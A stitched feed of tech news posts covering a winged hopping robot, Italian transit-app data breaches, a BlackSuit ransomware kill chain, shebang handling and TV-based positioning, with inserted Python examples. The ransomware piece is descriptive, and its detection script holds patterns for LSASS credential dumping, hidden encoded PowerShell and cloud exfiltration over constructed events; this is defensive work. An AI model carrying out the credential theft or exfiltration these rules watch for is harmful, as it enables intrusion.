Tiny Pogo Robot Gets Wings, Does Flips


Most robots depend on controlled environments, because the real world is hard to get around in. The smaller the robot, the bigger this problem because little wheels (or legs) can take only little steps. One way around that is MIT’s latest one-legged hopping robot, which sports a set of four insect-like wings on its top end and can quickly pogo-hop its way across different terrain with ease.
The four wings provide lift, and steer the robot so that its single leg lands precisely.
The wings aren’t for flying in the usual sense. They provide lift, but also help the tiny device steer itself so that its hops land precisely. Earlier incarnations of one-legged hopping robots (like this one) accomplished this with propellers and electric motors, but traditional motors are a non-starter on a device that weighs less than a paperclip.

Right now, this little winged hopper is not completely self-contained (power and control systems are off-board) but running it as a tethered unit allows researchers to test and evaluate different, minimalistic ways for a machine to move around efficiently. And efficiency is the whole goal of going in this direction.

Certainly tiny flying drones already exist and get about in the real world just fine. But if one wants to shed mass, ditch conventional motors, and reduce cost and power consumption, this tiny winged hopping machine is one way to do it. And it can even carry payloads! The payloads are tiny, of course, but being able to haul around ten times one’s own weight and still function reliably is an impressive feat.

You can watch it in action in the video embedded just below the page break. Once you’ve watched that, we’d like to remind you that novel locomotion isn’t just the domain of hopping robots. Tiny robots with explosive joints are just as wild as it sounds.

youtube.com/embed/UlxQz8F59Hk?…


hackaday.com/2025/04/12/tiny-p…


Repairing Classic Sound Cards


Sound hardware has been built into PC motherboards for so long now it’s difficult to remember the days when a sound card was an expensive add-on peripheral. By the mid to late 1990s they were affordable and ubiquitous enough to be everywhere, but three decades later some of them are starting to fail. [Necroware] takes us through the repair of a couple of Creative Labs Sound Blaster 16s, which were the card to have back then.

The video below is a relaxed look at typical problems afflicting second-hand cards with uncertain pasts. There’s a broken PCB trace on the first one, which receives a neat repair. The second one has a lot more wrong with it though, and reveals some surprises. We would have found the dead 74 series chips, but we’re not so sure we’d have immediately suspected a resistor network as the culprit.

Watching these cards become sought-after in the 2020s is a little painful for those of us who were there at the time, because it’s certain we won’t be the only ones who cleared out a pile of old ISA cards back in the 2000s. If you find one today and don’t have an ISA slot, worry not, because you can still interface it via your LPC bus.

youtube.com/embed/J4djhBXUQ1I?…


hackaday.com/2025/04/12/repair…


Personal Data Breach of the Tua Abruzzo App: Yet Another Supply Chain Attack


Tuabruzzo informs its users of a recent personal data breach involving the IT service provider MyCicero S.r.l., appointed as data processor.

Transparency towards users is an absolute priority, which is why it was decided to communicate openly what happened. The company stresses the importance of maintaining trust by promptly updating everyone affected.

The Tua Abruzzo app lets you buy tickets and passes for travelling on public transport across the whole region, check timetables, plan your journey by entering departure and arrival points and browsing all the available options, and keep everything at hand with no need for paper tickets.

The breach


In recent days, a supply chain attack on MyCicero surfaced as a breach caused by malicious activity by unidentified external actors who targeted its servers. As soon as it was notified of the incident, Tuabruzzo began all the checks needed to understand the extent and impact of the event.

As an immediate measure, access to the systems was temporarily suspended to allow urgent security work, which is why some users may have experienced slowdowns or problems accessing the app.

Despite strict data protection measures, the breach may have allowed unauthorised third parties to obtain users’ personal information. This is a significant risk, although no evidence of unlawful use of the stolen data has emerged so far. The company nevertheless urges users to be alert to any suspicious communications or unusual requests.

According to the analyses carried out, the data that may have been compromised consists of basic information such as first name, surname and e-mail address. No sensitive or banking information appears to be involved at this time, but Tuabruzzo continues to monitor the situation so that it can act promptly should new elements emerge.

Following the incident, security measures on the data management systems have been strengthened and further checks are under way to prevent future incidents. Tuabruzzo remains available to users for support and clarification, reaffirming its ongoing commitment to protecting the security of personal information.

Supply Chain Attacks


In the current climate we increasingly see “collateral” losses tied to problems in the supply chain. These are not exfiltrations that happen directly from the IT infrastructure of the affected companies, but breaches involving the third parties and external suppliers they work with. This scenario shows how suppliers have become a true “Achilles’ heel” of corporate cybersecurity. Not only in production, but also in the protection of data and digital services, the closest attention must be paid to these dynamics.

Supply chain attacks can take many forms: vulnerabilities in systems, malware infections, or misconduct by disloyal employees. The effects can be devastating, going as far as halting production lines and causing knock-on damage to customers, partners and corporate reputation.

For this reason, control and monitoring activities must not be limited to internal IT infrastructure alone, but must necessarily extend to the technology systems of partners and suppliers. It is essential that contracts include specific clauses setting out the minimum IT security standards to be met.

In a context where every link in the chain can be a vulnerability, it is indispensable to invest decisively in supply chain risk management. Our advice is to adopt concrete measures that provide for a right of audit, allowing the customer to carry out periodic security checks to verify compliance with the requirements set out in supply contracts. Looking into these aspects is no longer optional but a strategic necessity for every company. This is also required by Article 21 of NIS2, which states that entities must take appropriate and proportionate measures to assess and manage risks, including those relating to the security of supply chains, and ensure that contracts with suppliers include clauses allowing verification of compliance with security requirements.

Finally, it should be remembered that when a breach occurs it is almost always the end customer’s brand that appears in the newspapers, while the supplier involved often stays in the background. One more reason why supply chain security cannot be neglected.

This episode shows once again how supply chain attacks can have cascading effects on several organisations. The breach suffered by MyCicero did not affect only the Tuabruzzo app but also had repercussions for ATM Milano, another customer of the supplier. This situation shows how delicate the balance is between the IT infrastructure of service providers and that of the third parties that use them. The security of the whole digital ecosystem depends on the strength of every single link in the chain: a vulnerability at one point can spread quickly, involving several organisations and increasing exponentially the risks for users and companies.

The article “Violazione Dati Personali dell’App Tua Abruzzo: Un ennesimo attacco alla Supply Chain” comes from il blog della sicurezza informatica.


A Supply Chain Attack Hits Azienda Trasporti Milanesi (ATM), Which Notifies Its Users


ATM (Azienda Trasporti Milanesi) has informed its users of a security incident involving its official app. On the evening of Saturday 5 April, Mooney Servizi S.p.A., the company responsible for the technical management of the platform and for processing users’ personal data, suffered a cyber attack.

The news was immediately communicated to ATM, which began working with Mooney to deal with the situation. In response to the attack, the company promptly isolated the compromised systems, limiting further unauthorised access.

What happened


The attack led to the breach of some personal data of users registered with the ATM app. The information involved concerns identity, contact and customer profile data. Fortunately, no particularly sensitive data was compromised, such as credit cards, debit cards, other digital payment systems, app login credentials, or users’ home or residential addresses. This helped contain the incident in terms of possible financial consequences.

Despite the limited nature of the data involved, the incident still carries a risk of loss of confidentiality of personal information. In particular, the stolen data could be disclosed or used without authorisation. App users are therefore urged to watch out for any suspicious communications that might result from misuse of this information.

In response to the breach, ATM immediately took a series of urgent measures. The company asked Mooney Servizi for up-to-date, detailed reporting on the security measures implemented, in order to understand the extent of the attack and ensure an adequate response. In addition, security systems were immediately strengthened to further protect data and prevent new intrusion attempts.

ATM concludes by reassuring users of its continued commitment to protecting personal data. The company is working closely with Mooney Servizi and the competent authorities to monitor the situation and promptly update users on any developments. Transparency and privacy protection remain an absolute priority, at a time when cyber threats are unfortunately becoming ever more sophisticated.

ATM is a joint-stock company owned by the Municipality of Milan that runs the public transport service over an area with more than 3.3 million inhabitants, covering the city of Milan and 95 municipalities in Lombardy.

It also manages on-street parking enforcement, park-and-ride car parks, the “BikeMi” bike sharing service, the Integrated Traffic and Territory System (“SCTT”) and the “Area B” and “Area C” limited traffic zones of the Lombard capital.

The article “Un attacco alla Supply Chain colpisce L’Azienda Trasporti Milanesi ATM che lo comunica agli utenti” comes from il blog della sicurezza informatica.


From the Zoom Decoy to Ransomware Disaster: A Journey into the Heart of the BlackSuit Attack


It was an ordinary day when an unsuspecting user, probably getting ready for an imminent call, visited a site that appeared legitimately linked to Zoom, the well-known video-conferencing platform. Perfect graphics, a plausible domain, seemingly authentic content. But behind that reassuring interface lay a perfectly engineered trap. The user downloads what they believe is the official installer for the application. They run it. And without realising it, they throw open the doors to a multi-stage attack that will culminate, nine days later, in the complete devastation of their corporate environment.

This is what happened recently in an attack analysed in detail by The DFIR Report, which led to the infection and full encryption of a corporate network by the BlackSuit ransomware.

What follows is a journey through a multi-layered kill chain in which every malicious component has a clearly defined purpose and every step is designed to stay under the radar for as long as possible. An attack in which patience was the attacker’s main weapon, and where the real strength lay not in speed but in the silent, methodical occupation of the victim’s digital perimeter.

Phase one: initial access and loader installation


The first step of the attack is the one that has always proved among the most effective and dangerous: social engineering. The threat actor built a cloned Zoom site, polished enough to fool ordinary and corporate users alike. The downloaded file is nothing but a trojanised installer, apparently functional, but carrying the first malicious component of the chain: d3f@ckloader.

This loader, true to its name, performs no visible offensive activity itself but acts as a bridge to the subsequent payloads. Once executed, it immediately establishes encrypted communication with a command-and-control (C2) server and downloads additional components. Among these, one plays a key role in the early stages of the attack: SectopRAT.

Phase two: remote access and information gathering


SectopRAT (a Remote Access Trojan) is a tool already well known in the threat landscape, valued by malicious actors for its light footprint and the wide range of functions it offers. It not only allows remote access to the infected machine but includes keylogging, screen capture, file management and monitoring of user activity.

Using SectopRAT, the attacker begins to map the network and gather information about users, machine configuration and credentials. This phase is crucial: it is not yet a visible or destructive attack but a silent one, where every action aims to build detailed knowledge of the environment.

From the analysis of traffic and logs, numerous MITRE ATT&CK techniques can be observed, including:

  • T1018 – Remote System Discovery, to identify the machines connected to the network.
  • T1087.001 – Account Discovery: Local Account, to obtain an overview of local users.
  • T1047 – Windows Management Instrumentation, which allows remote queries and operations.
  • T1003.001 – Credential Dumping: LSASS Memory, to extract credentials directly from the RAM of the LSASS process.

The LSASS dump technique is a turning point: it gives the attacker privileged access (local admin, domain admin) and prepares the ground for lateral movement.

Phase three: post-exploitation with advanced tools


After nine days of discreet activity, the group changes pace. With privileged credentials in hand, the attacker loads two of the most feared post-exploitation tools in circulation today: Brute Ratel and Cobalt Strike.

  • Brute Ratel is a modern offensive framework designed to evade EDR systems and make detection much harder. It allows payload injection into legitimate processes, covert beaconing and sophisticated camouflage techniques.
  • Cobalt Strike, by contrast, is by now a classic. Its beacons, deployed across various machines on the network, let the attacker act in parallel, run commands, load modules, elevate privileges and start lateral movement operations.

QDoor is also activated, a malware that acts as a proxy for RDP connections, easing access to remote systems through encrypted tunnels. At this stage the attacker has total control of the network: they can log in, move around, impersonate users and administrators, gather information and prepare for the final act.

Phase four: exfiltration and impact


With the data under control, exfiltration follows, carried out through the Bublup cloud service. An apparently innocuous system for creating collections of files and notes, here abused to upload stolen information: credentials, configurations, sensitive data.

Then comes the final blow: the activation of BlackSuit, a modern, fast and highly destructive ransomware. The ransomware is spread using PsExec, a legitimate tool often abused by cybercriminals to push payloads to every reachable machine on the network.

The ransomware encrypts every file and drops ransom notes. The company is now completely paralysed. All of this took place over 194 hours, roughly eight days.

The MITRE map of the malware involved


The attached image is a graphical, conceptual representation of the attack, showing the relationships between the malware involved and the MITRE ATT&CK techniques used. On the left and right are the malware: from QDoor, BlackSuit and SectopRAT to Brute Ratel, Cobalt Strike and d3f@ckloader.

In the centre, in yellow, a dense web of techniques highlights the complexity and deliberateness of the attack. Techniques such as:

  • T1105 – Ingress Tool Transfer, for loading payloads.
  • T1059.001 – PowerShell, for silent execution.
  • T1560.001 – Archive Collected Data: Archive via Utility, used to package data before exfiltration.
  • T1021.002 – Remote Services: SMB/Windows Admin Shares, key to lateral movement.
  • T1486 – Data Encrypted for Impact, the ransomware’s closing technique.

This map is not just a snapshot but a strategic X-ray: it shows how malicious actors use different tools in a modular way, each specialised in a precise task. The overlap of techniques shows that these tools share common goals, and that the attack is not an isolated event but the result of careful, refined planning.
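The two technique lists above (phase two and the MITRE map) are what a detection engineer would turn into rules. The script below is an added example, not code from The DFIR Report or from the article: it runs a handful of such rules over constructed Sysmon-style events (the field names and every value, including the `.locked` extension, the `bublup.com` domain used as the watchlisted upload target, and the process allowlist, are assumptions of this example) and tags each hit with the ATT&CK ID the text names. The exfiltration rule uses T1567.002, ATT&CK's ID for Exfiltration to Cloud Storage, which is not in the article's list.

```python
"""Detection rules for the techniques named in the article, run over constructed
Sysmon-style events. Added example; the event shape and all values are ours."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed allowlist of processes that legitimately open lsass.exe.
LSASS_ALLOWED = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe"}
ARCHIVERS = {"7z.exe", "rar.exe", "winrar.exe", "makecab.exe", "tar.exe"}
# Assumption: domain of the Bublup service the report names as the exfiltration channel.
CLOUD_WATCHLIST = {"bublup.com"}
HIDDEN_PS = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|enc(?:odedcommand)?\b)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events, archive_to_upload=timedelta(minutes=30),
           burst=20, burst_window=timedelta(seconds=60)):
    """Return (host, technique_id, evidence) findings, one per rule trigger."""
    findings = []
    last_archive = {}            # host -> time an archive utility last ran
    writes = defaultdict(list)   # (host, image, extension) -> recent write times
    for e in sorted(events, key=lambda ev: ev["ts"]):
        t, host, kind = datetime.fromisoformat(e["ts"]), e["host"], e["type"]
        if kind == "process":
            image, cmd = basename(e["image"]), e.get("cmd", "")
            if image == "powershell.exe" and HIDDEN_PS.search(cmd):
                findings.append((host, "T1059.001", cmd))           # hidden or encoded PowerShell
            if image == "psexesvc.exe":
                findings.append((host, "T1021.002", e["image"]))    # PsExec service binary on a host
            if image in ARCHIVERS:
                last_archive[host] = t
                findings.append((host, "T1560.001", cmd))           # staging data with an archiver
        elif kind == "process_access":
            if basename(e["target_image"]) == "lsass.exe" and basename(e["source_image"]) not in LSASS_ALLOWED:
                findings.append((host, "T1003.001", e["source_image"]))  # LSASS memory access
        elif kind == "network":
            domain = e["dest_host"].lower()
            # Archive utility followed by an upload to a watchlisted cloud service on the same host.
            if domain in CLOUD_WATCHLIST and host in last_archive and t - last_archive[host] <= archive_to_upload:
                findings.append((host, "T1567.002", f"{basename(e['image'])} -> {domain}"))
        elif kind == "file":
            # One process rewriting many files to the same new extension in a short window.
            key = (host, basename(e["image"]), e["path"].rsplit(".", 1)[-1].lower())
            recent = [x for x in writes[key] if t - x <= burst_window] + [t]
            writes[key] = recent
            if len(recent) == burst:
                findings.append((host, "T1486", f"{key[1]} wrote {burst} *.{key[2]} files in {burst_window.seconds}s"))
    return findings


def technique_ids(findings):
    return {f[1] for f in findings}


# Constructed sample telemetry: a workstation compromised via the installer, then a file server.
SAMPLE_EVENTS = [
    {"ts": "2025-04-01T09:00:00", "host": "WS-17", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "powershell.exe -NoProfile Get-Date"},
    {"ts": "2025-04-01T09:05:00", "host": "WS-17", "type": "process_access",
     "source_image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe", "target_image": r"C:\Windows\System32\lsass.exe"},
    {"ts": "2025-04-01T09:10:00", "host": "WS-17", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "powershell.exe -w hidden -enc JABjAGwAaQBlAG4AdAA="},
    {"ts": "2025-04-01T09:20:00", "host": "WS-17", "type": "process_access",
     "source_image": r"C:\Users\user\AppData\Local\Temp\svc.exe", "target_image": r"C:\Windows\System32\lsass.exe"},
    {"ts": "2025-04-01T10:00:00", "host": "FS-01", "type": "process",
     "image": r"C:\Windows\PSEXESVC.exe", "cmd": "PSEXESVC.exe"},
    {"ts": "2025-04-01T10:30:00", "host": "FS-01", "type": "process",
     "image": r"C:\Program Files\7-Zip\7z.exe", "cmd": r"7z.exe a -mx1 C:\Windows\Temp\st.7z D:\Finance"},
    {"ts": "2025-04-01T10:45:00", "host": "FS-01", "type": "network",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "dest_host": "bublup.com"},
] + [
    {"ts": f"2025-04-01T11:00:{i:02d}", "host": "FS-01", "type": "file",
     "image": r"C:\Windows\Temp\enc.exe", "path": rf"D:\Finance\doc{i}.xlsx.locked"}  # '.locked' is constructed
    for i in range(25)
]

if __name__ == "__main__":
    for host, tid, evidence in detect(SAMPLE_EVENTS):
        print(f"{host:6} {tid:10} {evidence}")
```

The benign events (Defender touching LSASS, an ordinary PowerShell invocation) produce nothing; the six malicious ones each map to one technique. The archive-then-upload correlation and the write-burst rule are the two that survive a change of tooling, since they key on behaviour rather than on a particular binary name.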

Final considerations


What is most striking about this attack is not its final violence but the patience and operational intelligence with which it was carried out. The silent start, the time spent on discovery, the methodical theft of credentials, the strategic deployment of beacons and finally the detonation of the ransomware: every phase was executed with surgical precision.

In this scenario, countermeasures must evolve. No single solution can stop such a structured attack on its own: a layered approach is needed, including effective EDR/XDR, network segmentation, continuous staff training, careful credential management and, above all, a strategic view of security.

Because in war, as in cybersecurity, whoever prepares best wins.

The article “Dall’inganno di Zoom al disastro ransomware: viaggio nel cuore dell’attacco BlackSuit” comes from il blog della sicurezza informatica.


Tracing the #!: How the Linux Kernel Handles the Shebang


One of the delights in Bash, zsh, or whichever shell tickles your fancy in your OSS distribution of choice, is the ease with which you can use scripts. These can be shell scripts, or use Perl, Python or another interpreter, as defined by the shebang (#!) at the beginning of the script. This signature is followed by the path to the interpreter, which can be /bin/sh for maximum compatibility across OSes, but how does this actually work? As [Bruno Croci] found while digging into this question, it is not the shell that interprets the shebang, but the kernel.

It’s easy enough to find out the basic execution sequence using strace after you run an executable shell script with said shebang in place. The first point is in execve, a syscall that gets one straight into the Linux kernel (fs/exec.c). Here the ‘binary program’ is analyzed for its executable format, which for the shell script gets us to binfmt_script.c. Incidentally the binfmt_misc.c source file provides an interesting detour, as it concerns magic byte sequences used to do something similar to a shebang.

As a bonus [Bruno] also digs into the difference between executing a script with shebang or running it in a shell (e.g. sh script.sh), before wrapping up with a look at where the execute permission on a shebang-ed shell script is checked.
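To make the kernel-side handling concrete, here is an added example (not [Bruno]'s code and not kernel code) that models what binfmt_script does with the first line of a script: pick the interpreter, treat whatever follows it as a single argument, and rebuild the argv the interpreter actually receives. It also models the point the text closes on: the execute bit is checked before any format handler looks at the file, so a non-executable script never gets as far as shebang parsing. The `BINPRM_BUF_SIZE` constant is the kernel's; the function names are this example's own.

```python
"""Model of how the Linux kernel's binfmt_script handler turns a '#!' line into
the argv it hands to the interpreter. Added example, not kernel code; the rules
mirror load_script() in fs/binfmt_script.c as described in the text."""
import os
import re

BINPRM_BUF_SIZE = 256  # bytes of the file read before a binfmt handler is chosen


class NoExec(Exception):
    """Stands in for -ENOEXEC: the script handler does not accept this file."""


def parse_shebang(head: bytes):
    """Split the first line of a file the way the kernel does.

    Returns (interpreter, argument) as bytes; argument is None when absent.
    Everything after the interpreter path, up to end of line, is ONE argument,
    so b'#!/usr/bin/env -S python3 -u' yields the single argument b'-S python3 -u'.
    """
    if not head.startswith(b"#!"):
        raise NoExec("no #! magic at offset 0")
    # Only the first BINPRM_BUF_SIZE bytes are available to the handler; how a
    # first line longer than that is treated varies by kernel version and is
    # deliberately not modelled here.
    line = head[:BINPRM_BUF_SIZE].split(b"\n", 1)[0]
    body = line[2:].strip(b" \t")  # blanks before the path and at end of line are dropped
    if not body:
        raise NoExec("no interpreter name found")
    parts = re.split(rb"[ \t]+", body, maxsplit=1)
    return parts[0], (parts[1] if len(parts) == 2 else None)


def is_script(head: bytes) -> bool:
    """True when binfmt_script would claim the file."""
    try:
        parse_shebang(head)
        return True
    except NoExec:
        return False


def kernel_argv(head: bytes, filename: str, argv):
    """argv the interpreter receives for execve(filename, argv, envp) on a script.

    The caller's argv[0] is dropped and replaced by the script path; the optional
    argument and then the interpreter path are pushed in front of it.
    """
    interp, arg = parse_shebang(head)
    new_argv = [interp.decode()]
    if arg is not None:
        new_argv.append(arg.decode())
    new_argv.append(filename)
    new_argv.extend(argv[1:])
    return new_argv


def exec_argv_for_file(path: str, argv):
    """Same for a file on disk. The execute bit is checked before any binfmt
    handler looks at the content, so a non-executable script never reaches the
    shebang parsing at all (the permission check the text mentions)."""
    if not os.access(path, os.X_OK):
        raise PermissionError(f"{path}: execute permission denied")
    with open(path, "rb") as f:
        head = f.read(BINPRM_BUF_SIZE)
    return kernel_argv(head, path, argv)


if __name__ == "__main__":
    import tempfile

    with tempfile.NamedTemporaryFile("wb", suffix=".py", delete=False) as f:
        f.write(b"#!/usr/bin/env -S python3 -u\nprint('hi')\n")
    os.chmod(f.name, 0o755)
    print(exec_argv_for_file(f.name, [f.name, "--flag"]))
    os.unlink(f.name)
```

This is also why `sh script.sh` behaves differently: there the file handed to execve is the shell binary, an ELF, so the kernel never reads the script at all; the shell opens it as data and the `#!` line is just a comment to it, and no execute bit on the script is required.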


hackaday.com/2025/04/11/tracin…


Creating a Somatosensory Pathway From Human Stem Cells


Human biology is very much like that of other mammals, and yet so very different in areas where it matters. One of these is human neurology: aspects like the human brain and the somatosensory pathways (touch and the like) are not only hard to study in non-human animal analogs, but also (genetically) different enough that a human test subject is required. Over the past few years human organoids have come into use; these are (parts of) organs grown from human pluripotent stem cells, and thus allow for ethical human experimentation.

For studying aspects like the somatosensory pathways, several such organoids must be combined, and recently [Ji-il Kim] et al., as published in Nature, demonstrated the creation of a so-called assembloid. This four-part assembloid contains somatosensory, spinal, thalamic and cortical organoids, covering the entirety of such a pathway from e.g. one’s skin to the brain’s cortex where the sensory information is received.

Such assembloids are – much like organoids – extremely useful for not only studying biological and biochemical processes, but also to research diseases and disorders, including tactile deficits as previously studied in mouse models by e.g. [Lauren L. Orefice] et al. caused by certain genetic mutations in Mecp2 and other genes, as well as genes like SCN9A that can cause clinical absence of pain perception.

Using these assembloids the development of these pathways can be studied in great detail and therapies developed and tested.


hackaday.com/2025/04/11/creati…


Gemini 2.0 + Robotics = Slam Dunk?


A humanoid robot packs a lunch bag in the kitchen

Over on the Google blog [Joel Meares] explains how Google built the new family of Gemini Robotics models.

The bi-arm ALOHA robot equipped with Gemini 2.0 software can take general instructions and then respond dynamically to its environment as it carries out its tasks. This family of robots aims to be highly dexterous, interactive, and general-purpose by applying the sort of non-task-specific training methods that have worked so well with LLMs, and applying them to robot tasks.

There are two things we here at Hackaday are wondering. Is there anything a robot will never do? And just how cherry-picked are these examples in the slick video? Let us know what you think in the comments!

youtube.com/embed/4MvGnmmP3c0?…


hackaday.com/2025/04/11/gemini…


A Mouse, No Hands!


There are some ideas which someone somewhere has to try. Take [Uri Tuchman]’s foot mouse. It’s a computer mouse for foot operation, but it’s not just a functional block. Instead it’s an ornate inlaid-wood-and-brass affair in the style of a very fancy piece of antique footwear.

The innards of an ordinary USB mouse are placed in something best described as a wooden platform heel, upon which is placed a brass sole with a couple of sections at the front to activate the buttons with the user’s toes. The standout feature is the decoration. With engraving on the brass and inlaid marquetry on the wood, it definitely doesn’t look like any computer peripheral we’ve seen.

The build video is below the break, and we’re treated to all the processes sped up. At the end he uses it in a basic art package and in a piloting game, with varying degrees of success. We’re guessing it would take a lot of practice to gain a level of dexterity with this thing, but we salute him for being the one who tries it.

This has to be the fanciest peripheral we’ve ever seen, but surprisingly it’s not the first foot mouse we’ve brought you.

youtube.com/embed/Lqgbl6JoYoQ?…


hackaday.com/2025/04/11/a-mous…


GPS Broken? Try TV!


GPS and similar satellite navigation systems revolutionized how you keep track of where you are and what time it is. However, it isn’t without its problems. For one, it generally doesn’t work very well indoors or in certain geographic or weather scenarios. It can be spoofed. Presumably, a real or virtual attack could take the whole system down.

Addressing these problems is a new system called Broadcast Positioning System (BPS). It uses upgraded ATSC 3.0 digital TV transmitters to send exact time information from commercial broadcast stations. With one signal, you can tell what time it is within 100 ns 95% of the time. If you can hear four towers, you can not only tell the time, but also estimate your position within about 100 m.

The whole thing is new — we’ve read that there are only six transmitters currently sending such data. However, you can get a good overview from these slides from the National Association of Broadcasters. They point out that the system works well indoors and can work with GPS, help detect if GPS is wrong, and stand in for GPS if it were to go down suddenly.

If all digital TV stations adopt this, the presentation mentions that there would be 516 VHF stations operating with up to 10 kW over two widely separated bands. Add to that 1,526 UHF stations running between 100 kW and 1000 kW. So there is plenty of power, and plenty of diversity in frequency. Coverage is spotty in some parts of the country, though. A large part of the western United States would lack visibility of the four stations required for a position fix. Of course, currently there are only five or six stations, so this is theoretical at this point.

The Real Story


If you read the slide deck, the real story is at the end in the backup slides. That shows the ATSC standard frame and how the preamble changes. The math is fairly standard stuff. You know where the stations are, you know what time they think they sent the signal, and you can estimate the range to each station. With three or four stations, you can get a good idea of where you must be based on the relative receive times.

The stations diversify their time sources, which helps guard against spoofing. For example, they may get time information from GPS, the network, a local atomic clock, and even neighboring stations, and use that to create an accurate local time that they send out with their signal.
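The "fairly standard" math of the previous two paragraphs, carried through as an added example (not from the NAB slides; the station layout, receiver position and timings are constructed): stations at known positions transmit on a shared time base, the receiver sees their relative arrival times and solves for its position plus its own clock offset with a small Gauss-Newton fit. Because the receiver's clock is an unknown, three stations give an exact solution and a fourth adds redundancy; that redundancy is also what lets a receiver notice that one signal does not agree with the others, the defender's side of the spoofing concern raised above. The `solve_fix`/`check_consistency` names and the 30 m threshold (the range equivalent of the 100 ns timing figure) are this example's own choices.

```python
"""Worked example of the position fix the slide deck describes: known station
positions, a shared transmit time base, and relative arrival times at a receiver
whose own clock is unknown. Added example, not from the NAB material; station
coordinates and timings are constructed."""
import math

C = 299_792_458.0  # speed of light, m/s: 100 ns of timing error is about 30 m of range


def solve3(a, b):
    """Gaussian elimination with partial pivoting for a 3x3 system a*x = b."""
    m = [row[:] + [b[i]] for i, row in enumerate(a)]
    for col in range(3):
        piv = max(range(col, 3), key=lambda r: abs(m[r][col]))
        m[col], m[piv] = m[piv], m[col]
        for r in range(3):
            if r != col:
                f = m[r][col] / m[col][col]
                m[r] = [v - f * w for v, w in zip(m[r], m[col])]
    return [m[i][3] / m[i][i] for i in range(3)]


def arrival_times(stations, receiver, clock_bias_s):
    """Constructed measurements: every station transmits at t=0 of the shared
    time base; the receiver's clock reads clock_bias_s too late."""
    return [math.dist(s, receiver) / C + clock_bias_s for s in stations]


def solve_fix(stations, arrivals, guess, iters=25):
    """Gauss-Newton fit of (x, y, clock bias) to three or more pseudoranges.

    Works in metres so the Jacobian is well scaled: rho_i = |p - s_i| + B with
    B = c * bias. Returns ((x, y), bias_seconds, residual_rms_m).
    """
    rho = [C * t for t in arrivals]
    n = len(stations)
    x, y, B = guess[0], guess[1], 0.0
    for _ in range(iters):
        J, r = [], []
        for (sx, sy), ri in zip(stations, rho):
            d = math.hypot(x - sx, y - sy)
            r.append(ri - (d + B))
            J.append([(x - sx) / d, (y - sy) / d, 1.0])
        JtJ = [[sum(J[k][i] * J[k][j] for k in range(n)) for j in range(3)] for i in range(3)]
        Jtr = [sum(J[k][i] * r[k] for k in range(n)) for i in range(3)]
        dx, dy, dB = solve3(JtJ, Jtr)
        x, y, B = x + dx, y + dy, B + dB
        if math.hypot(dx, dy) < 1e-3:
            break
    resid = [ri - (math.hypot(x - sx, y - sy) + B) for (sx, sy), ri in zip(stations, rho)]
    return (x, y), B / C, math.sqrt(sum(v * v for v in resid) / n)


def check_consistency(stations, arrivals, guess, threshold_m=30.0):
    """Integrity check against a faulty or spoofed signal.

    With more stations than the three unknowns, a residual RMS well above the
    timing error budget (30 m ~ 100 ns) means the set is inconsistent. Naming
    the bad station needs one more station again: drop each in turn and keep
    the subset that becomes consistent. Returns (pos, bias, rms, flag) where
    flag is None (consistent), -1 (inconsistent, too few stations to say which)
    or the index of the station to exclude.
    """
    pos, bias, rms = solve_fix(stations, arrivals, guess)
    if rms <= threshold_m:
        return pos, bias, rms, None
    if len(stations) < 5:
        return pos, bias, rms, -1
    best = None
    for i in range(len(stations)):
        sub_pos, sub_bias, sub_rms = solve_fix(stations[:i] + stations[i + 1:],
                                               arrivals[:i] + arrivals[i + 1:], guess)
        if best is None or sub_rms < best[2]:
            best = (sub_pos, sub_bias, sub_rms, i)
    return best


# Constructed geometry: five transmitters tens of km apart, receiver at (12 km, 9 km).
STATIONS = [(0.0, 0.0), (40000.0, 0.0), (0.0, 30000.0), (35000.0, 35000.0), (20000.0, -15000.0)]
RECEIVER, BIAS_S, GUESS = (12000.0, 9000.0), 5e-6, (20000.0, 15000.0)

if __name__ == "__main__":
    clean = arrival_times(STATIONS, RECEIVER, BIAS_S)
    print(check_consistency(STATIONS, clean, GUESS))
    spoofed = list(clean)
    spoofed[3] += 10e-6  # one tower's signal arrives 10 us (about 3 km) late
    print(check_consistency(STATIONS, spoofed, GUESS))
    print(check_consistency(STATIONS[:4], spoofed[:4], GUESS))
```

With four stations the receiver can tell that something is wrong but not which tower to distrust; with five it can isolate the offender and still produce a clean fix from the rest, which is the same redundancy argument the stations themselves apply when they cross-check several time sources before transmitting.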

Learn More


Most of the slides come from more detailed white papers you can find on the NAB website. A lot of the site is dedicated to explaining why you can’t live without GPS, but you can’t depend on it, either. The bottom right part of the page has the technical papers you’ll probably be more interested in.

GPS is an impressive system, but we know it needs some help. BPS reminded us a bit of LORAN.


hackaday.com/2025/04/11/gps-br…


Hackaday Podcast Episode 316: Soft Robots, Linux the Hard Way, Cellphones into SBCs, and the Circuit Graver


Join Hackaday Editors Elliot Williams and Tom Nardi as they talk about the best stories and hacks of the week. This episode starts off with a discussion of the Vintage Computer Festival East and Philadelphia Maker Faire — two incredible events that just so happened to be scheduled for the same weekend. From there the discussion moves on to the latest developments in DIY soft robotics, the challenge of running Linux on 8-pin ICs, hardware mods to improve WiFi reception on cheap ESP32 development boards, and what’s keeping old smartphones from being reused as general purpose computers.

You’ll also hear about Command and Conquer: Red Alert running on the Pi Pico 2, highly suspect USB-C splitters, and producing professional looking PCBs at home with a fiber laser. Stick around to the end to hear about the current state of non-Google web browsers, and a unique new machine that can engrave circuit boards with remarkable accuracy.

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!

html5-player.libsyn.com/embed/…

As always, the Hackaday Podcast is available as a DRM-free MP3 download.

Episode 316 Show Notes:

What’s that Sound?


  • Congratulations to [laserkiwi] for winning a Hackaday Podcast t-shirt!



hackaday.com/2025/04/11/hackad…


Audio Effects Applied to Text


If you are a visual thinker, you might enjoy [AIHVHIA’s] recent video, which shows the effect of applying audio processing to text displayed on an oscilloscope. The video is below.

Of course, this presupposes you have some way to display text on an oscilloscope. Audio driving the X and Y channels of the scope does all the work. We aren’t sure exactly how he’s doing that, but we suspect it is something like Osci-Render.

